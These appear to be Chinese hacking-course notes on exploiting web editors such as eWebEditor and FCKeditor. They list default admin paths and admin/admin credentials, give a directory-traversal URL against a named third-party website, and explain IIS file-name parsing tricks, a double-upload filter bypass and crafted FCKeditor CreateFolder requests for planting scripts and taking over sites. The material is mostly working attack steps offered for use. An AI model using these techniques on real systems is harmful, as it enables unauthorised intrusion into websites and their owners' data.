小迪教程第十二天——编辑器漏洞

1、目前网站采用编辑器有哪些？

Ewebeditor(asp)，fckeditor（asp/aspx)，kindeditor(php)，southidceditor，cfeditor(php)等

2、ewebeditor编译器漏洞

找后台地址，尝试默认帐号密码登录，添加上传类型，上传脚本文件获得网站权限（地址找不到，默认帐号密码被修改，无法添加上传类型）

默认后台地址：ewebeditor/admin_login.asp
默认帐号密码：admin/admin
默认数据库地址：ewebeditor/db/ewebeditor.mdb

无法添加上传类型时，可自行添加上传图片按钮
出现浏览器上传图片按钮失效，可采用ietest软件模拟ie6.0访问上传

ewebeditor目录遍历漏洞，主要存在于asp
http://www.kirinmach.com/ewebeditor/admin_uploadfile.asp?id=14&dir=../..

3、Fck高版本过滤“.” （“.”变”_”）

基于解析漏洞利用获取网站权限

解析漏洞：
文件 xx.asp;.jpg
文件夹 xx.asp/xx.jpg

1、二次上传突破（windows同目录不可能存在两个同名的文件）
第一次上传：qq.asp;.jpg ==> qq_asp;.jpg
第二次上传：qq.asp;.jpg =/=> qq_asp;.jpg（qq.asp;(1).jpg）

2、新建上传突破

成功新建文件夹数据包：L
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
失败手工创建文件夹数据包：
FCKeditor_2.5//editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=qq.asp

过滤的是参数NewFolderName，而没有过滤参数CurrentFolder，CurrentFolder参数能操作文件夹